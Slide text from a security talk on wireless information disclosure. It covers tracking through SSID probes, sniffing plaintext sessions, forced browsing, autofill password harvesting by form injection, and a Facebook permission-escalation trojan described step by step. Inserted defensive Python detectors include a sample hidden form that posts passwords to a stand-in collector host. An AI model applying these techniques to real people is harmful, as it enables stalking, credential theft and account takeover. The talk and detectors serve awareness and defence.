So let me show you what you are unknowingly disclosing to the world...
personal information is the key to exploiting blind trust
your information disclosures weaken the security of the organizations that you are associated with
What do your network probes say about you?
Or where you've been?
IT MEANS YOU CAN BE TRACKED!
(This is true especially when the network names are unique)
Your wireless device stores the network name (SSID) of access points you have connected to in the past
and is ALWAYS trying to reconnect (conveniently) for you automatically.
And interestingly enough:
it also means that personality traits & characteristics can potentially be identified
- attwifi
- hhonors
- gogoinflight
- cafe on 8th
- OperaHouseLobby
- IBM-Corp
- IBM-Conference
- Chuck-E-Cheese
- linksys
- dlink
- HPSETUP
- Allie's Macbook
- Steven's Macbook
- Hooters
- FugSportsBarAndGrill
- Buffalo Wild Wings
- attwifi
- tmobile
- Hey apt317 - Shut your dog up!
Low Severity leads to High Severity
Convenience Is An Attack Vector
But nobody seems to care ...
CONVENIENCE IS WINNING
In the battle between convenience and security
unless it's their own personal information that's being disclosed.
Analysis of Information Disclosures
Confessions of Your Stalker
Confessions of Your Identity Thief
802.11 Ways to Annoy You
Alternate Presentation Titles
MARK WUERGLER
Security Researcher / Penetration Tester / SILICA Developer
for Immunity Inc.
YOU ARE DISCLOSING WHERE YOU HAVE BEEN
What do we know about you so far?
01) MAC Address
02) What you connect to
03) Current GPS location
04) Preferred Network Names / Locations
05) Data
Time It Takes To Access Your Plaintext Data
Your photo's metadata can also disclose GPS data.
You tell us what networks you have privileged access to
(since you can't hide a data frame)
The MAC address of the wireless access point also offers us
a point in space that can be plotted on a map for geographical tracking.
So what else can we get?
06) Name
07) Address
08) Age
09) Passwords
10) Phone Number
11) Family
12) Friends
13) Pizza Preference
14) Browsing Habits
15) Emails
16) Text Messages
17) ...
18) ...
Attack Scenario: Find the corporate wireless device that is also ARPing for the local Starbucks. It's an attacker's path of least resistance to gain unauthorized access to company resources.
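The probe-request disclosure described above and the corporate-device attack scenario, turned into a defender's check (an added example, not STALKER's or Immunity's code): it parses the SSID element out of 802.11 probe requests and flags stations that probe for both a corporate SSID and a public hotspot, which is exactly the pairing the scenario relies on. The frames, MAC addresses and SSID sets below are constructed for the example.

```python
from collections import defaultdict

PROBE_REQ_FC0 = 0x40  # frame control byte 0: type=management (00), subtype=probe request (0100)

def build_probe_request(src_mac: bytes, ssid: str) -> bytes:
    """Construct a minimal 802.11 probe request (sample input, not a real capture)."""
    bcast = b"\xff" * 6
    header = bytes([PROBE_REQ_FC0, 0x00]) + b"\x00\x00" + bcast + src_mac + bcast + b"\x00\x00"
    body = ssid.encode("utf-8")
    ssid_ie = bytes([0x00, len(body)]) + body          # tag 0 = SSID
    rates_ie = bytes([0x01, 0x01, 0x82])               # tag 1 = supported rates (1 Mbit/s)
    return header + ssid_ie + rates_ie

def parse_probe_request(frame: bytes):
    """Return (source MAC, SSID) for a probe request; SSID is None for a wildcard probe."""
    if len(frame) < 24 or (frame[0] & 0xFC) != PROBE_REQ_FC0:
        return None                                     # not a probe request
    src = ":".join(f"{b:02x}" for b in frame[10:16])   # addr2 is the transmitting station
    body, i = frame[24:], 0
    while i + 2 <= len(body):                           # walk the tagged parameters
        tag, length = body[i], body[i + 1]
        value = body[i + 2 : i + 2 + length]
        if len(value) != length:
            break                                       # truncated element, stop parsing
        if tag == 0:                                    # a zero-length SSID discloses nothing
            return src, (value.decode("utf-8", "replace") if length else None)
        i += 2 + length
    return src, None

def probing_for_both(frames, corporate: set, public: set) -> dict:
    """Map each station that probed for a corporate SSID *and* a public one to its SSID set."""
    seen = defaultdict(set)
    for frame in frames:
        parsed = parse_probe_request(frame)
        if parsed and parsed[1] is not None:
            seen[parsed[0]].add(parsed[1])
    return {mac: s for mac, s in seen.items() if s & corporate and s & public}

# Constructed sample: one laptop probes for the corporate network and a hotspot, another only
# for the corporate network, plus a wildcard probe that discloses nothing.
SAMPLE_FRAMES = [
    build_probe_request(b"\x00\x11\x22\x33\x44\x55", "IBM-Corp"),
    build_probe_request(b"\x00\x11\x22\x33\x44\x55", "attwifi"),
    build_probe_request(b"\x00\x11\x22\x33\x44\x55", ""),
    build_probe_request(b"\x66\x77\x88\x99\xaa\xbb", "IBM-Corp"),
]

if __name__ == "__main__":
    print(probing_for_both(SAMPLE_FRAMES, {"IBM-Corp"}, {"attwifi", "tmobile"}))
```

Fed with frames from a monitor-mode capture instead of the constructed ones, the same check gives a wireless IDS a cheap signal that a corporate device is also carrying public-hotspot credentials.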
Now that we have access to plaintext data
we can start looking for more personal information disclosures ...
STALKER
PCAP -> PEOPLE = PEOPLECAP!
was the result of a research project to determine if I could shape identities and personalities of those in control of data-transmitting devices. Everything that is "interesting" is stored in a database.
Do you know what you are leaking?
Things to Consider
Sites often use SSL to protect password transmission but don't protect
the authenticated session or the data that is in it.
XSRF tokens DON'T WORK if everyone gets to peek at them ...
If data is not encrypted it's vulnerable to man-within-range-of-you
attacks (with wireless you don't have to be in the middle of anything ;)
Sites that disclose personal data are interesting but sites that
offer an API to your personal data are even more interesting.
- and your passwords, chats, sms messages, downloaded files, etc, etc, etc ...
AGGRESSIVE ENUMERATION
OF PERSONAL DATA
FORCED BROWSING
Using content injection to manipulate the content rendered in a target's browser for the purpose of exploitation, personal data enumeration or forced marketing.
FORCED MARKETING
Using forced browsing to generate like's, +1's, votes, clicks as well as to inject custom web content and ads into an active web session.
Forcing you to disclose your personal information
DEMO
FORCED BROWSING
Using content injection to control the browser
1. A wireless client makes a request to an unencrypted website.
2. An attacker sees the client's request and generates a modified response.
2a. The modified response will make everything appear normal to the client, but includes hidden code to initiate the forced browsing.
3. The attacker sends the forged response to the client before the real response arrives.
4. The client computer sees cnn.com as expected, but executes the attacker's hidden code and is secretly directed to information-disclosing websites.
DEMO
CONTENT INJECTION
Form injection to retrieve stored passwords
1. Client either visits a website or is forced to visit a website whose password is stored by the browser.
2. An attacker injects a form to mimic what is auto-populated by the browser.
3. The code is executed, and sends the browser-populated data to the attacker.
Convenience is an attack vector
Ever use these?
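A content-inspection check for the injected form described in the steps above (an added example, not code from the talk): it audits every password form in a page and flags any that is hidden from the user or that posts to a different origin than the page itself, the two properties an autofill-harvesting form needs. The page URL, HTML and hostnames are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class LoginFormAuditor(HTMLParser):
    """Collect every <form> that contains a password field, with its action and visibility."""
    def __init__(self):
        super().__init__()
        self.forms, self._cur = [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            style = (a.get("style") or "").replace(" ", "").lower()
            hidden = "hidden" in a or "display:none" in style or "visibility:hidden" in style
            self._cur = {"action": a.get("action") or "", "hidden": hidden, "password": False}
        elif tag == "input" and self._cur is not None and (a.get("type") or "").lower() == "password":
            self._cur["password"] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._cur is not None:
            if self._cur["password"]:
                self.forms.append(self._cur)
            self._cur = None

def suspicious_login_forms(page_url: str, html: str) -> list:
    """Flag password forms that are invisible to the user or that submit to another origin."""
    auditor = LoginFormAuditor()
    auditor.feed(html)
    page = urlparse(page_url)
    findings = []
    for form in auditor.forms:
        action = urlparse(form["action"])       # a relative action has no netloc: same origin
        off_origin = bool(action.netloc) and (action.scheme, action.netloc) != (page.scheme, page.netloc)
        if form["hidden"] or off_origin:
            findings.append({**form, "off_origin": off_origin})
    return findings

# Constructed sample: the site's real login form, plus an injected invisible copy that the
# browser would autofill and that submits to a host the page never referenced.
SAMPLE_PAGE_URL = "http://music.example/player"
SAMPLE_HTML = """
<form action="/login" method="post">
  <input type="text" name="user"><input type="password" name="pass">
</form>
<form action="http://collector.example/grab" method="post" style="display: none">
  <input type="text" name="user"><input type="password" name="pass">
</form>
"""

if __name__ == "__main__":
    for finding in suspicious_login_forms(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print(finding)
```

The heuristic is deliberately narrow (inline style and the hidden attribute only); a form moved off-screen by a stylesheet would need the rendered layout to detect.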
Little by Little:
building a profile against you one site at a time.
What can I find out about you when all you are doing is listening to Pandora?
DEMO
CONTENT INJECTION
Turning a trusted Facebook application into a trojan
1. An attacker forces a logged-in user to browse to a facebook application's permission dialog (non-SSL)
2. The attacker collects XSRF tokens from the permission dialog's HTML
3. The attacker generates a POST request with all possible application permissions and forces the (re-)installation of the application by simulating the "Allow" click.
By escalating permissions and grabbing your access key:
THE ATTACKER HAS FULL, ANYTIME ACCESS TO ALL
YOUR FACEBOOK DATA INCLUDING YOUR:
INBOX, CHATS, EMAIL, PHONE, ADDRESS, FAMILY, FRIENDS, STATUSES, PHOTOS, WALL POSTS, LOCATIONS, RELATIONSHIPS, EMPLOYMENT DATA, & EVERYTHING ELSE FACEBOOK HAS TO OFFER.
THE ATTACKER CAN EVEN SEND YOU SMS MESSAGES OR POST TO YOUR WALL AS YOU.
BEFORE the attack there were only a few default permissions set for this trusted app.
AFTER the attack,
all of the available
permissions are set.
LIVE DEMO
CONTENT INJECTION
Install a Facebook trojan/backdoor
Fermat's Last Theorem
Using data or access we have in order to get the data or access we want.
Scenario: Your gmail account is over SSL but your backup email that you have registered (for password recovery) is under our control.
[it's in the clear so it's under everyone's control, really].
Some sites forget that 3rd party sites that they interact with are a part of the security model. You're only as strong as your weakest link, etc.
Answers to popular security questions ...
Pet's name?
Mother's maiden name?
Favorite book/movie?
Birthday?
Birthplace?
Teacher's name?
Phone numbers?
Childhood friend?
Hero/rolemodel?
What is this thing - this thing right here - what is it?!
Answers to these questions are all over the websites you visit, especially social networking sites.
Even though the email and phone number are obfuscated we have enough information (in STALKER) to piece together which email account the recovery process will use.
Conclusion #1
1) your information disclosures weaken the security of the organizations that you are associated with
TODO :
2)